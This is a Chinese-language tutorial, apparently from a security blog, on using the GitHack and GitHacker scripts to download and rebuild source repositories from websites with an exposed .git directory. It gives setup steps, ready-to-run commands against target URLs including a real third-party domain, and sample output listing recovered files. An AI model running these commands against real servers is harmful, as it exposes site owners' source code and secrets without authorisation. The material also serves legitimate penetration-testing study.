免责声明
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!譬如收集大规模集群(包括网络设备、操作系统、应用程序)的监控数据并进行存储。查询使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范
Githack
GitHack脚本是一种针对Git源代码管理系统的安全漏洞利用工具。它主要用于发现和利用那些公开暴露了.git目录结构的Web服务器。当一个Web服务器配置错误,导致.git目录可以通过HTTP或HTTPS协议直接访问时,攻击者可以利用GitHack脚本来下载、恢复并重建整个源代码仓库。
确认目标网站是否存在git泄露,可以dirseach扫,显示200(有时403也行)
使GitHack.py脚本下载,https://github.com/lijiejie/GitHack(用魔法)
具体使用方法:
建一个文件夹git,在git里建一个lib,将网站里的GItHack.py放在git里, 其余的两个py放在lib里,之后在git里面cmd
具体操作:
Windows:
py GitHack.py http://目标网站/.git/ (py3环境 ) (ps:建议将GitHack.py更名为1.py之类的,更方便,我就单纯的更改为小写githack.py了)
失败
`D:\tool\Git>python GitHack.py http://www.baidu.com/.git`
`[+] Download and parse index file ...`
`[ERROR] index file download failed: HTTP Error 404: Not Found`
成功
`Download and parse index file``.env.example .ftpconfig.qitattributes github/workflows/development.yml .gitignore .htaccess README.Md app/Admin/Municipality.php app/AdminReport.php app/Category.php app/Client.php app/Console/Commands/Inspire.php app/Console/Kernel.php app/Contact.php app/ContactCategory.php` (此处为下载的文件)
Linux:
获取 GitHacker 工具包:
git clone https://github.com/WangYihang/GitHacker.git
cd GitHacker
下载 .git 文件并使用python脚本自动恢复该目录下的文件:
python GitHacker.py http://www.baidu.com/.git`
